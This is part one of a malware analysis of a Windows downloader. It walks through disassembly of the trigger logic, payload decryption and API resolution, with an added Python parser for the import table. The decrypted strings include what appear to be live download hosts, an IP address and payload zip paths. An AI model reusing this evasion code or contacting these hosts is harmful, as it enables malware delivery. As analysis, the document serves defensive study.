Virus Analysis: A Downloader (Part 1)
1. Trigger conditions
0x1: It relies on the Windows message mechanism.
0x2: It checks whether settings.ini exists in the current directory.
0x3: If it exists, the malicious payload is launched.
0x4: If it does not, the process simply stays resident.
First a window class is registered; its window procedure is 0x00401760.
004011A2|.8D45 D0 lea eax, [ebp-30] ; eax -> WNDCLASSEX (lpfnWndProc = 0x00401760)
004011A5|.50 push eax ; /pWndClassEx
004011A6|.FF15 54304000 call dword ptr [<&USER32.RegisterClas>; \RegisterClassExA
A window is then created with CreateWindowExA; from the parameters we can see that its Height is 0.
004012AC|.6A 00 push 0x0 ; /lParam = NULL
004012AE|.8B4D 08 mov ecx, [ebp+8] ; |
004012B1|.51 push ecx ; |hInst
004012B2|.6A 00 push 0x0 ; |hMenu = NULL
004012B4|.6A 00 push 0x0 ; |hParent = NULL
004012B6|.6A 00 push 0x0 ; |Height = 0x0
004012B8|.68 00000080 push 0x80000000 ; |Width = 80000000 (-2147483648.)
004012BD|.6A 00 push 0x0 ; |Y = 0x0
004012BF|.68 00000080 push 0x80000000 ; |X = 80000000 (-2147483648.)
004012C4|.68 0000CF00 push 0xCF0000 ; |Style = WS_OVERLAPPED|WS_MINIMIZEBOX|WS_MAXIMIZEBOX|WS_SYSMENU|WS_THICKFRAME|WS_CAPTION
004012C9|.68 10404000 push 00404010 ; |WindowName = "trast"
004012CE|.68 18404000 push 00404018 ; |Class = "bask"
004012D3|.6A 00 push 0x0 ; |ExtStyle = 0
004012D5|.FF15 34304000 call dword ptr [<&USER32.CreateWindow>; \CreateWindowExA
CreateWindowExA triggers a WM_CREATE message. WM_CREATE is a non-queued message, so it is delivered directly to the window procedure.
In the WM_CREATE handler, CreateFileA is called on settings.ini with OPEN_EXISTING:
004017CA > \8B4D 08 mov ecx, dword ptr [ebp+8]
004017CD .890D E0434000 mov dword ptr [4043E0], ecx
004017D3 .6A 00 push 0x0 ; /lParam = NULL
004017D5 .8B15 80424000 mov edx, dword ptr [404280] ; |23.00400000
004017DB .52 push edx ; |hInst => 00400000
004017DC .6A 00 push 0x0 ; |hMenu = NULL
004017DE .8B45 08 mov eax, dword ptr [ebp+8] ; |
004017E1 .50 push eax ; |hParent
004017E2 .6A 1C push 0x1C ; |Height = 1C (28.)
004017E4 .68 A0000000 push 0xA0 ; |Width = A0 (160.)
004017E9 .6A 28 push 0x28 ; |Y = 28 (40.)
004017EB .6A 28 push 0x28 ; |X = 28 (40.)
004017ED .68 04000040 push 0x40000004 ; |Style = WS_CHILD|4
004017F2 .8D4D 8C lea ecx, dword ptr [ebp-74] ; |
004017F5 .51 push ecx ; |WindowName
004017F6 .68 B4304000 push 004030B4 ; |Class = "EDIT"
004017FB .6A 00 push 0x0 ; |ExtStyle = 0
004017FD .FF15 34304000 call dword ptr [<&USER32.CreateWindow>; \CreateWindowExA
00401803 .A3 E4434000 mov dword ptr [4043E4], eax
00401808 .6A 00 push 0x0 ; /hTemplateFile = NULL
0040180A .6A 00 push 0x0 ; |Attributes = 0
0040180C .6A 03 push 0x3 ; |Mode = OPEN_EXISTING
0040180E .6A 00 push 0x0 ; |pSecurity = NULL
00401810 .6A 00 push 0x0 ; |ShareMode = 0
00401812 .68 00000080 push 0x80000000 ; |Access = GENERIC_READ
00401817 .68 BC304000 push 004030BC ; |FileName = "settings.ini"
0040181C .FF15 20304000 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
If settings.ini exists, a WM_COMMAND message is posted to the thread's message queue, which triggers the payload.
If settings.ini does not exist, the program enters its message loop and stays resident.
00401822 .8945 84 mov dword ptr [ebp-7C], eax
00401825 .837D 84 FF cmp dword ptr [ebp-7C], -0x1
00401829 .75 13 jnz short 0040183E
0040182B .6A 67 push 0x67 ; /lParam = 0x67
0040182D .6A 68 push 0x68 ; |wParam = 0x68
0040182F .68 11010000 push 0x111 ; |Message = WM_COMMAND
00401834 .8B55 08 mov edx, dword ptr [ebp+8] ; |
00401837 .52 push edx ; |hWnd
00401838 .FF15 38304000 call dword ptr [<&USER32.PostMessageA>; \PostMessageA
0040183E >B8 01000000 mov eax, 0x1
The WM_COMMAND handler checks the value of wParam:
wParam 0x68: create a modal dialog whose dialog procedure is 0x00401B60.
wParam 0x69: call DestroyWindow to destroy the window.
0040184D > \8B45 10 mov eax, dword ptr [ebp+10]
00401850 .25 FFFF0000 and eax, 0xFFFF
00401855 .0FB7C8 movzx ecx, ax
00401858 .894D 88 mov dword ptr [ebp-78], ecx
0040185B .8B55 10 mov edx, dword ptr [ebp+10]
0040185E .C1EA 10 shr edx, 0x10
00401861 .81E2 FFFF0000 and edx, 0xFFFF
00401867 .0FB7C2 movzx eax, dx
0040186A .8945 80 mov dword ptr [ebp-80], eax
0040186D .8B4D 88 mov ecx, dword ptr [ebp-78]
00401870 .898D 74FFFFFF mov dword ptr [ebp-8C], ecx
00401876 .83BD 74FFFFFF>cmp dword ptr [ebp-8C], 0x68
0040187D .74 0B je short 0040188A
0040187F .83BD 74FFFFFF>cmp dword ptr [ebp-8C], 0x69
00401886 .74 20 je short 004018A8
00401888 .EB 2A jmp short 004018B4
0040188A >6A 00 push 0x0 ; /lParam = NULL
0040188C .68 601B4000 push 00401B60 ; |DlgProc = 23.00401B60
00401891 .8B55 08 mov edx, dword ptr [ebp+8] ; |
00401894 .52 push edx ; |hOwner
00401895 .8B45 14 mov eax, dword ptr [ebp+14] ; |
00401898 .50 push eax ; |pTemplate
00401899 .8B0D 80424000 mov ecx, dword ptr [404280] ; |23.00400000
0040189F .51 push ecx ; |hInst => 00400000
004018A0 .FF15 68304000 call dword ptr [<&USER32.DialogBoxPar>; \DialogBoxParamA
004018A6 .EB 24 jmp short 004018CC
004018A8 >8B55 08 mov edx, dword ptr [ebp+8]
004018AB .52 push edx ; /hWnd
004018AC .FF15 30304000 call dword ptr [<&USER32.DestroyWindo>; \DestroyWindow
DialogBoxParamA triggers a WM_INITDIALOG message.
In that handler SendMessageA sends EM_GETHANDLE to the edit control to obtain its text buffer; SendMessageA delivers the message straight to the window procedure.
The string in the buffer is: Hello disop top..pussy woosy hi..little doka cry.
The code then finds the position of the first 's' (0x73) in that string, stores it in local.1, and destroys the window.
Finally local.1 is passed in ecx and call 00401CB0 begins decrypting the payload.
00401B83|> \6A 00 push 0x0 ; /lParam = 0x0
00401B85|.6A 00 push 0x0 ; |wParam = 0x0
00401B87|.68 BD000000 push 0xBD ; |Message = EM_GETHANDLE
00401B8C|.8B0D E4434000 mov ecx, dword ptr [4043E4] ; |
00401B92|.51 push ecx ; |hWnd => 0x2006B0
00401B93|.FF15 40304000 call dword ptr [<&USER32.SendMessageA>; \SendMessageA
00401B99|.8945 F8 mov [ebp-8], eax
00401B9C|.8B55 F8 mov edx, [ebp-8]
00401B9F|.8B02 mov eax, dword ptr [edx]
00401BA1|.8945 F4 mov [ebp-C], eax
00401BA4|.C745 FC 00000>mov [ebp-4], 0x0
00401BAB|>8B4D F4 /mov ecx, [ebp-C]
00401BAE|.0FBE11 |movsx edx, byte ptr [ecx]
00401BB1|.83FA 73 |cmp edx, 0x73
00401BB4|.74 14 |je short 00401BCA
00401BB6|.8B45 FC |mov eax, [ebp-4]
00401BB9|.83C0 01 |add eax, 0x1
00401BBC|.8945 FC |mov [ebp-4], eax
00401BBF|.8B4D F4 |mov ecx, [ebp-C]
00401BC2|.83C1 01 |add ecx, 0x1
00401BC5|.894D F4 |mov [ebp-C], ecx
00401BC8|.^ EB E1 \jmp short 00401BAB
00401BCA|>8B15 E0434000 mov edx, dword ptr [4043E0]
00401BD0|.52 push edx ; /hWnd => 002706B4 ('trast',class='bask')
00401BD1|.FF15 30304000 call dword ptr [<&USER32.DestroyWindo>; \DestroyWindow
00401BD7|.8B4D FC mov ecx, [ebp-4]
00401BDA|.E8 D1000000 call 00401CB0
00401BDF|.33C0 xor eax, eax
2. Decrypting the payload
0x1: Decrypt the string "VirtualProtect" and obtain its address.
0x2: Call VirtualProtect to make the data writable, then decrypt it.
0x3: Obtain the required APIs and copy the body to the Temp directory.
0x4: Check whether the body is running from Temp; if not, run the copy in Temp and terminate the current process.
0x5: If it is, begin the malicious routine.
edx = 0x00401A60 + 8 = 0x00401A68 (the loop counter ecx is the index of the first 's', which is 8); 0x00401A68 and then 0x00401D40 are pushed in turn.
00401CB0 $55 push ebp
00401CB1 .BA 601A4000 mov edx, 00401A60
00401CB6 .8F05 84424000 pop dword ptr [404284]
00401CBC >42 inc edx
00401CBD .^ E2 FD loopd short 00401CBC
00401CBF .52 push edx
00401CC0 .8D35 F0434000 lea esi, dword ptr [4043F0]
00401CC6 .8BFE mov edi, esi
00401CC8 .68 401D4000 push 00401D40 ; entry address
00401CCD .C3 retn ; RET used as a jump to 00401D40
0x00401D40 runs first; afterwards execution returns into 0x00401A68.
00401A68|.6A 11 push 0x11
00401A6A|.6A 0B push 0xB
00401A6C|.E8 5F040000 call 00401ED0
00401A71|.5E pop esi
00401A72|.5F pop edi
00401A73|.8BE5 mov esp, ebp
00401A75|.5D pop ebp
00401A76\.C3 retn
Decryption routine:
00401900 >/$56 push esi ; esi = key
00401901|.57 push edi ; edi = address of the data to decrypt
00401902|.53 push ebx ; ebx = key size
00401903|.50 push eax ; eax = current key pointer
00401904|.5B pop ebx ; ebx = eax
00401905|.8BD3 mov edx, ebx ; edx = eax
00401907|>51 /push ecx ; ecx = size
00401908|.E8 63000000 |call 00401970 ; decryption routine
0040190D|.59 |pop ecx
0040190E|.^ E2 F7 \loopd short 00401907
00401910|.5B pop ebx
00401911|.5F pop edi
00401912|.5E pop esi
00401913|.33C0 xor eax, eax
00401915\.C3 retn
Data before decryption:
004043CC  89 2E CF 45 B9 AB D0 F5 CE F8 3D BA 24 C9 31 00  (not printable)
Data after decryption:
004043CC  56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00     VirtualProtect.
GetApiAddress is called to obtain the address of VirtualProtect:
00401380 > /57 push edi
00401381 . |8B0D 14304000 mov ecx, dword ptr [<&KERNEL32.GetMo>; kernel32.GetModuleHandleA
00401387 . |890D 8C424000 mov dword ptr [40428C], ecx
0040138D . |51 push ecx
0040138E . |33C0 xor eax, eax
00401390 . |E8 DB000000 call <GetApiAddress> ; returns the address of VirtualProtect
00401395 . |68 B0114000 push 004011B0
0040139A . |C3 retn ; RET used as a jump to 004011B0
0x00402050 is made writable so that the data there can be decrypted:
0040121F > \BA 50204000 mov edx, 00402050 ; the block to be decrypted
00401224 .68 A00F0000 push 0FA0
00401229 .52 push edx
0040122A .8D35 10164000 lea esi, dword ptr [401610]
00401230 .FFD7 call edi ; VirtualProtect: make 402050 writable
00401232 .B9 FA090000 mov ecx, 9FA ; ecx = 9FA
00401237 .8D3D 50204000 lea edi, dword ptr [402050] ; edi = 402050
0040123D .48 dec eax
0040123E .85C0 test eax, eax
00401240 .0F84 FA030000 je 00401640
The decrypted strings form a table whose records have the structure 0x01 + dllName + 0x00 + ApiName + 0x00 (further ApiName + 0x00 entries follow for the same DLL); a 0x02 byte ends the API records and starts the plain string list:
0040205E .4C 6F 61 64 4>ascii "LoadLibraryA",0
0040206B .47 65 74 50 7>ascii "GetProcAddress",0
0040207A 01 db 01
0040207B .6E 74 64 6C 6>ascii "ntdll.dll",0
00402085 .73 77 70 72 6>ascii "swprintf",0
0040208E .52 74 6C 44 6>ascii "RtlDecompressBuf"
0040209E .66 65 72 00 ascii "fer",0
004020A2 01 db 01
004020A3 .6B 65 72 6E 6>ascii "kernel32.dll",0
004020B0 .6C 73 74 72 6>ascii "lstrcmpW",0
004020B9 .47 65 74 43 6>ascii "GetComputerNameW"
004020C9 .00 ascii 0
004020CA .47 65 74 56 6>ascii "GetVersionExW",0
004020D8 .47 65 74 4D 6>ascii "GetModuleFileNam"
004020E8 .65 57 00 ascii "eW",0
004020EB .47 65 74 54 6>ascii "GetTempPathW",0
004020F8 .43 72 65 61 7>ascii "CreateFileW",0
00402104 .52 65 61 64 4>ascii "ReadFile",0
0040210D .57 72 69 74 6>ascii "WriteFile",0
00402117 .44 65 6C 65 7>ascii "DeleteFileW",0
00402123 .47 65 74 43 7>ascii "GetCurrentDirect"
00402133 .6F 72 79 57 0>ascii "oryW",0
00402138 .6C 73 74 72 6>ascii "lstrlenW",0
00402141 .43 6C 6F 73 6>ascii "CloseHandle",0
0040214D .47 65 74 46 6>ascii "GetFileSize",0
00402159 .56 69 72 74 7>ascii "VirtualAlloc",0
00402166 .53 6C 65 65 7>ascii "SleepEx",0
0040216E .45 78 69 74 5>ascii "ExitProcess",0
0040217A 01 db 01
0040217B .77 69 6E 69 6>ascii "wininet.dll",0
00402187 .49 6E 74 65 7>ascii "InternetOpenW",0
00402195 .49 6E 74 65 7>ascii "InternetConnectW"
004021A5 .00 ascii 0
004021A6 .48 74 74 70 4>ascii "HttpOpenRequestW"
004021B6 .00 ascii 0
004021B7 .48 74 74 70 5>ascii "HttpSendRequestW"
004021C7 .00 ascii 0
004021C8 .49 6E 74 65 7>ascii "InternetCloseHan"
004021D8 .64 6C 65 00 ascii "dle",0
004021DC .49 6E 74 65 7>ascii "InternetReadFile"
004021EC .00 ascii 0
004021ED 01 db 01
004021EE .73 68 65 6C 6>ascii "shell32.dll",0
004021FA .53 68 65 6C 6>ascii "ShellExecuteW",0
00402208 02 db 02
00402209 50 db 50 ;CHAR 'P'
0040220A 00 db 00
0040220B .25 73 25 73 0>ascii "%s%s",0
00402210 .25 73 5C 25 7>ascii "%s\%s",0
00402216 .6F 70 65 6E 0>ascii "open",0
0040221B .74 65 78 74 2>ascii "text/*",0
00402222 .61 70 70 6C 6>ascii "application/*",0
00402230 .47 45 54 00 ascii "GET",0
00402234 .4F 70 65 72 6>ascii "Opera",0
0040223A .74 7A 71 75 7>ascii "tzquw.exe",0
00402244 .39 34 2E 32 3>ascii "94.23.247.202",0
00402252 .73 6C 70 78 6>ascii "slpxl.exe",0
0040225C .70 6F 72 66 6>ascii "porfintengoweb.c"
0040226C .6F 6D 00 ascii "om",0
0040226F .2F 63 73 73 2>ascii "/css/11s1.zip",0
0040227D .6A 63 2D 63 6>ascii "jc-charge-it.nl",0
0040228D .2F 70 61 67 6>ascii "/pages/11s1.zip",0
0040229D .69 79 62 6B 6>ascii "iybkc.exe",0
004022A7 .66 6C 69 67 6>ascii "flightss.d-webs."
004022B7 .63 6F 6D 00 ascii "com",0
004022BB .2F 69 6D 61 6>ascii "/images/airlines"
004022CB .2D 6C 6F 67 6>ascii "-logo/h76id30.zi"
004022DB .70 00 ascii "p",0
004022DD .65 74 61 78 6>ascii "etaxiuae.com",0
004022EA .2F 75 70 6C 6>ascii "/uploads/h76id30"
004022FA .2E 7A 69 70 0>ascii ".zip",0
004022FF .31 31 30 38 7>ascii "1108us1",0
00402307 .31 31 30 38 6>ascii "1108h",0
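As an added example (not code from the original post), the following Python parses the decrypted import table listed above: the two bootstrap names, then the 0x01-prefixed DLL records, stopping at the 0x02 that starts the string section. Because the resolution loop at 0x00402355 pushes each address as it is obtained, and three string-helper pointers are pushed on top at 0x00402381-0x00402391 before `mov ebp, esp`, the same list also yields the `[ebp+XX]` slot of every API, which is what the `call dword ptr [ebp+XX]` lines in the rest of the listing index. The sample blob is constructed from the names in the dump, the slot arithmetic (0x0C plus 4 per API, counted from the end) is my reading of the listing, and the function names are mine.

```python
"""Parser for the decrypted import table (added example, not code from the
original post). Layout as read from the listing:
  "LoadLibraryA\0GetProcAddress\0"            two bootstrap names resolved first
  0x01 dllName\0 ApiName\0 [ApiName\0 ...]     one record per DLL
  0x02 ...                                   start of the plain string section
"""

# Constructed sample: same layout, names copied from the dump in the post.
SAMPLE = (
    b"LoadLibraryA\x00GetProcAddress\x00"
    b"\x01ntdll.dll\x00swprintf\x00RtlDecompressBuffer\x00"
    b"\x01kernel32.dll\x00lstrcmpW\x00GetComputerNameW\x00GetVersionExW\x00"
    b"GetModuleFileNameW\x00GetTempPathW\x00CreateFileW\x00ReadFile\x00"
    b"WriteFile\x00DeleteFileW\x00GetCurrentDirectoryW\x00lstrlenW\x00"
    b"CloseHandle\x00GetFileSize\x00VirtualAlloc\x00SleepEx\x00ExitProcess\x00"
    b"\x01wininet.dll\x00InternetOpenW\x00InternetConnectW\x00HttpOpenRequestW\x00"
    b"HttpSendRequestW\x00InternetCloseHandle\x00InternetReadFile\x00"
    b"\x01shell32.dll\x00ShellExecuteW\x00"
    b"\x02"
)

REC_DLL, REC_END = 0x01, 0x02
HELPER_SLOTS = 3   # the three pointers pushed at 0x00402381-0x00402391 (my reading)


def _cstring(buf, pos):
    """Read a NUL-terminated ASCII string starting at pos; return (text, next_pos)."""
    end = buf.index(b"\x00", pos)
    return buf[pos:end].decode("ascii"), end + 1


def parse_import_table(buf):
    """Return (bootstrap_names, [(dll, [api, ...]), ...], offset_of_string_section)."""
    pos = 0
    bootstrap = []
    for _ in range(2):                      # "LoadLibraryA", "GetProcAddress"
        name, pos = _cstring(buf, pos)
        bootstrap.append(name)
    records = []
    while True:
        tag = buf[pos]
        pos += 1
        if tag == REC_END:                  # 0x02: API records are finished
            return bootstrap, records, pos
        if tag != REC_DLL:
            raise ValueError("unexpected tag 0x%02x at offset %d" % (tag, pos - 1))
        dll, pos = _cstring(buf, pos)       # 0x01 is followed by the DLL name
        apis = []
        while buf[pos] not in (REC_DLL, REC_END):   # API names until the next tag
            api, pos = _cstring(buf, pos)
            apis.append(api)
        records.append((dll, apis))


def frame_slot_map(records):
    """Map [ebp+offset] -> API name for the frame set up by 'mov ebp, esp'.
    APIs are pushed in resolution order, so the last one resolved sits lowest,
    directly above the three helper pointers at [ebp], [ebp+4], [ebp+8]."""
    apis = [api for _, names in records for api in names]
    slots = {}
    for i, api in enumerate(apis):
        slots[4 * HELPER_SLOTS + 4 * (len(apis) - 1 - i)] = api
    return slots


def annotate(records, offset):
    """Reading aid: annotate(records, 0x50) -> 'CreateFileW' for 'call dword ptr [ebp+50]'."""
    return frame_slot_map(records).get(offset, "<not an API slot>")
```

Running `parse_import_table(SAMPLE)` gives four DLL records with 25 APIs in total, which together with the two bootstrap names matches the 27 entries in the stack dump above; `annotate(records, 0x20)` returns `InternetConnectW`, as the comment on the `call dword ptr [ebp+20]` line says.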
After the data at 0x00402050 has been decrypted, execution jumps into it:
00401640 > \A1 8C424000 mov eax, dword ptr [40428C]
00401645 .50 push eax
00401646 .8D15 70144000 lea edx, dword ptr [<GetApiAddress>]
0040164C .52 push edx
0040164D .B8 28000000 mov eax, 28
00401652 .E8 A9020000 call <DecryptCall>
00401657 .85C0 test eax, eax
00401659 .0F84 F1090000 je 00402050
The usual self-locating code (call/pop):
00402050 > \E8 00000000 call 00402055
00402055 $5B pop ebx
00402056 .83C3 09 add ebx, 9 ; ebx -> the decrypted data
00402059 .E9 CE020000 jmp 0040232C
Obtaining the addresses of the required functions:
00402331 .895D F4 mov dword ptr [ebp-C], ebx
00402334 .53 push ebx
00402335 .FF75 04 push dword ptr [ebp+4]
00402338 .FF55 00 call dword ptr [ebp] ; get the address of LoadLibraryA
0040233B .8945 FC mov dword ptr [ebp-4], eax
0040233E .50 push eax
0040233F .33C0 xor eax, eax
00402341 >8A03 mov al, byte ptr [ebx]
00402343 .43 inc ebx
00402344 .85C0 test eax, eax
00402346 .^ 75 F9 jnz short 00402341 ; advance to the next function name
00402348 .53 push ebx
00402349 .FF75 04 push dword ptr [ebp+4]
0040234C .FF55 00 call dword ptr [ebp] ; get the address of GetProcAddress
0040234F .8945 F8 mov dword ptr [ebp-8], eax
00402352 .50 push eax
00402353 .8BF3 mov esi, ebx
00402355 >AC lods byte ptr [esi]
00402356 .84C0 test al, al
00402358 .^ 75 FB jnz short 00402355
0040235A .AC lods byte ptr [esi]
0040235B .FEC8 dec al ; Switch (cases 1..2)
0040235D .74 0F je short 0040236E ; load a DLL
0040235F .FEC8 dec al
00402361 .74 14 je short 00402377
00402363 .4E dec esi ; Default case of switch 0040235B
00402364 .56 push esi
00402365 .FF75 F0 push dword ptr [ebp-10]
00402368 .FF55 F8 call dword ptr [ebp-8] ; GetProcAddress
0040236B .50 push eax
0040236C .^ EB E7 jmp short 00402355
0040236E >56 push esi ; Case 1 of switch 0040235B
0040236F .FF55 FC call dword ptr [ebp-4] ; LoadLibraryA
00402372 .8945 F0 mov dword ptr [ebp-10], eax
00402375 .^ EB DE jmp short 00402355
The resolved API addresses (stack dump):
0012F9E0  7D685FDD  shell32.ShellExecuteW
0012F9E4  7669826F  wininet.InternetReadFile
0012F9E8  76694DD4  wininet.InternetCloseHandle
0012F9EC  766E36AC  wininet.HttpSendRequestW
0012F9F0  7669F507  wininet.HttpOpenRequestW
0012F9F4  7669EE30  wininet.InternetConnectW
0012F9F8  7668AF85  wininet.InternetOpenW
0012F9FC  7C81CB12  kernel32.ExitProcess
0012FA00  7C8023A0  kernel32.SleepEx
0012FA04  7C809AF1  kernel32.VirtualAlloc
0012FA08  7C810B17  kernel32.GetFileSize
0012FA0C  7C809BE7  kernel32.CloseHandle
0012FA10  7C809AA9  kernel32.lstrlenW
0012FA14  7C80B917  kernel32.GetCurrentDirectoryW
0012FA18  7C831F63  RETURN to kernel32.DeleteFileW
0012FA1C  7C810E27  kernel32.WriteFile
0012FA20  7C801812  kernel32.ReadFile
0012FA24  7C810800  kernel32.CreateFileW
0012FA28  7C830791  RETURN to kernel32.GetTempPathW
0012FA2C  7C80B475  kernel32.GetModuleFileNameW
0012FA30  7C80AF05  kernel32.GetVersionExW
0012FA34  7C8316CF  kernel32.GetComputerNameW
0012FA38  7C80AA6C  kernel32.lstrcmpW
0012FA3C  7C980BE1  ntdll.RtlDecompressBuffer
0012FA40  7C9384BB  RETURN to ntdll.swprintf
0012FA44  7C80AE40  kernel32.GetProcAddress
0012FA48  7C801D7B  kernel32.LoadLibraryA
0012FA4C  7D590000  offset shell32.#599
0012FA50  0040205E  ASCII "LoadLibraryA"
0012FA54  7C80AE40  kernel32.GetProcAddress
0012FA58  7C801D7B  kernel32.LoadLibraryA
Next it locates three helper functions used to fetch strings by index, and copies the decrypted string data into newly allocated memory as UNICODE.
00402377 > \8B45 F4 mov eax, dword ptr [ebp-C] ; Case 2 of switch 0040235B
0040237A .8BC8 mov ecx, eax
0040237C .05 42060000 add eax, 642 ; locate Unknown_1
00402381 .50 push eax
00402382 .8BC1 mov eax, ecx
00402384 .05 4D060000 add eax, 64D ; locate Unknown_2
00402389 .50 push eax
0040238A .8BC1 mov eax, ecx
0040238C .05 5A050000 add eax, 55A ; locate Unknown_3
00402391 .50 push eax
00402392 .8BEC mov ebp, esp
00402394 .81C4 8CFDFFFF add esp, -274
0040239A >6A 04 push 4
0040239C .68 00100000 push 1000
004023A1 .68 C0D8A700 push 0A7D8C0
004023A6 .6A 00 push 0
004023A8 .FF55 30 call dword ptr [ebp+30] ; VirtualAlloc
004023AB .85C0 test eax, eax ; eax = 0x00A70000
004023AD .^ 74 EB je short 0040239A
004023AF .8945 BC mov dword ptr [ebp-44], eax
004023B2 .05 80841E00 add eax, 1E8480
004023B7 .8945 B8 mov dword ptr [ebp-48], eax
004023BA .05 00127A00 add eax, 7A1200
004023BF .8945 F4 mov dword ptr [ebp-C], eax
004023C2 .B9 00100000 mov ecx, 1000
004023C7 .03C1 add eax, ecx
004023C9 .8945 F0 mov dword ptr [ebp-10], eax
004023CC .03C1 add eax, ecx
004023CE .03C1 add eax, ecx
004023D0 .8945 D0 mov dword ptr [ebp-30], eax
004023D3 .03C1 add eax, ecx
004023D5 .8945 FC mov dword ptr [ebp-4], eax
004023D8 .8BD8 mov ebx, eax
004023DA .03C1 add eax, ecx
004023DC .8BF8 mov edi, eax
004023DE .33C0 xor eax, eax
004023E0 .66:AD lods word ptr [esi]
004023E2 .8945 AC mov dword ptr [ebp-54], eax ; var_54 = 0x50
004023E5 .33C0 xor eax, eax
004023E7 .8BC8 mov ecx, eax
004023E9 .8BD0 mov edx, eax
004023EB >893B mov dword ptr [ebx], edi
004023ED .83C3 04 add ebx, 4
004023F0 >AC lods byte ptr [esi] ; esi = 0x0040220B
004023F1 .3C 01 cmp al, 1
004023F3 .74 09 je short 004023FE
004023F5 .66:AB stos word ptr es:[edi] ; 0x13FE680
004023F7 .41 inc ecx
004023F8 .84C0 test al, al
004023FA .^ 75 F4 jnz short 004023F0
004023FC .^ EB ED jmp short 004023EB
004023FE >33C0 xor eax, eax
00402400 .AC lods byte ptr [esi]
00402401 .8975 F8 mov dword ptr [ebp-8], esi
00402404 .C1E0 02 shl eax, 2
00402407 .03F0 add esi, eax
00402409 .33C0 xor eax, eax
0040240B .AC lods byte ptr [esi]
0040240C .8945 A4 mov dword ptr [ebp-5C], eax
0040240F .897D A0 mov dword ptr [ebp-60], edi
00402412 .8BC8 mov ecx, eax
00402414 .FC cld
00402415 >AD lods dword ptr [esi]
00402416 .AB stos dword ptr es:[edi]
00402417 .33C0 xor eax, eax
00402419 .66:AD lods word ptr [esi]
0040241B .AB stos dword ptr es:[edi]
0040241C .^ E2 F7 loopd short 00402415
0040241E .B8 00040000 mov eax, 400 ; the ASCII strings have been converted to UNICODE above
00402423 .897D B0 mov dword ptr [ebp-50], edi
00402426 .03F8 add edi, eax
00402428 .897D 94 mov dword ptr [ebp-6C], edi
0040242B .8BDF mov ebx, edi
0040242D .03D8 add ebx, eax
0040242F .B0 2F mov al, 2F
00402431 .AA stos byte ptr es:[edi]
00402432 .33C0 xor eax, eax
00402434 .AA stos byte ptr es:[edi]
00402435 .B8 C8000000 mov eax, 0C8
It obtains the computer name and the OS version, gets the full path of the current module, and reads the current file into the memory allocated with VirtualAlloc.
It then builds the path of tzquw.exe in the temporary directory and compares it with the full module path; this is another of the trigger conditions.
0040243A .8D75 98 lea esi, dword ptr [ebp-68]
0040243D .8906 mov dword ptr [esi], eax
0040243F .56 push esi
00402440 .57 push edi
00402441 .FF55 60 call dword ptr [ebp+60] ; GetComputerNameW
00402444 .AD lods dword ptr [esi]
00402445 .D1E0 shl eax, 1
00402447 .03F8 add edi, eax
00402449 .B0 2F mov al, 2F
0040244B .AA stos byte ptr es:[edi]
0040244C .33C0 xor eax, eax
0040244E .AA stos byte ptr es:[edi]
0040244F .B4 04 mov ah, 4
00402451 .895D 98 mov dword ptr [ebp-68], ebx
00402454 .8BFB mov edi, ebx
00402456 .03D8 add ebx, eax
00402458 .B9 1C010000 mov ecx, 11C
0040245D .8BF3 mov esi, ebx
0040245F .890E mov dword ptr [esi], ecx
00402461 .56 push esi
00402462 .FF55 5C call dword ptr [ebp+5C] ; GetVersionExW
00402465 .33C0 xor eax, eax
00402467 .B0 2F mov al, 2F
00402469 .66:AB stos word ptr es:[edi]
0040246B .AD lods dword ptr [esi]
0040246C .AD lods dword ptr [esi]
0040246D .04 30 add al, 30
0040246F .66:AB stos word ptr es:[edi]
00402471 .AD lods dword ptr [esi]
00402472 .04 30 add al, 30
00402474 .66:AB stos word ptr es:[edi]
00402476 .81C6 0E010000 add esi, 10E
0040247C .AC lods byte ptr [esi]
0040247D .3C 01 cmp al, 1
0040247F .74 0C je short 0040248D
00402481 .B0 53 mov al, 53
00402483 .66:AB stos word ptr es:[edi]
00402485 .B0 45 mov al, 45
00402487 .66:AB stos word ptr es:[edi]
00402489 .B0 52 mov al, 52
0040248B .66:AB stos word ptr es:[edi]
0040248D >83EE 07 sub esi, 7
00402490 .66:AD lods word ptr [esi]
00402492 .66:85C0 test ax, ax
00402495 .74 12 je short 004024A9
00402497 .50 push eax
00402498 .B0 2D mov al, 2D
0040249A .66:AB stos word ptr es:[edi]
0040249C .B0 53 mov al, 53
0040249E .66:AB stos word ptr es:[edi]
004024A0 .B0 50 mov al, 50
004024A2 .66:AB stos word ptr es:[edi]
004024A4 .58 pop eax
004024A5 .04 30 add al, 30
004024A7 .66:AB stos word ptr es:[edi]
004024A9 >33C0 xor eax, eax
004024AB .B0 2F mov al, 2F
004024AD .66:AB stos word ptr es:[edi]
004024AF .33C0 xor eax, eax
004024B1 .66:AB stos word ptr es:[edi]
004024B3 .BB FF0F0000 mov ebx, 0FFF
004024B8 .8B7D F4 mov edi, dword ptr [ebp-C]
004024BB .53 push ebx
004024BC .57 push edi
004024BD .33C0 xor eax, eax
004024BF .50 push eax
004024C0 .FF55 58 call dword ptr [ebp+58] ; GetModuleFileNameW
004024C3 .8B75 F0 mov esi, dword ptr [ebp-10]
004024C6 .56 push esi
004024C7 .53 push ebx
004024C8 .FF55 54 call dword ptr [ebp+54] ; GetTempPathW
004024CB .B9 07000000 mov ecx, 7
004024D0 .FF55 08 call dword ptr [ebp+8] ; fetch the string "tzquw.exe"
004024D3 .50 push eax
004024D4 .56 push esi
004024D5 .B9 00000000 mov ecx, 0
004024DA .FF55 08 call dword ptr [ebp+8] ; fetch the format string "%s%s"
004024DD .50 push eax
004024DE .56 push esi
004024DF .FF55 6C call dword ptr [ebp+6C] ; swprintf
004024E2 .83C4 18 add esp, 18
004024E5 >33C0 xor eax, eax
004024E7 .50 push eax
004024E8 .68 80000000 push 80
004024ED .6A 03 push 3
004024EF .50 push eax
004024F0 .6A 01 push 1
004024F2 .68 00000080 push 80000000
004024F7 .57 push edi
004024F8 .FF55 50 call dword ptr [ebp+50] ; CreateFileW
004024FB .83F8 FF cmp eax, -1
004024FE .^ 74 E5 je short 004024E5 ; retry until CreateFileW succeeds
00402500 .8945 EC mov dword ptr [ebp-14], eax
00402503 .6A 00 push 0
00402505 .50 push eax
00402506 .FF55 34 call dword ptr [ebp+34] ; GetFileSize
00402509 .8945 E8 mov dword ptr [ebp-18], eax
0040250C .50 push eax
0040250D .57 push edi
0040250E .FF55 3C call dword ptr [ebp+3C] ; lstrlenW
00402511 .40 inc eax
00402512 .D1E0 shl eax, 1
00402514 .8945 D4 mov dword ptr [ebp-2C], eax
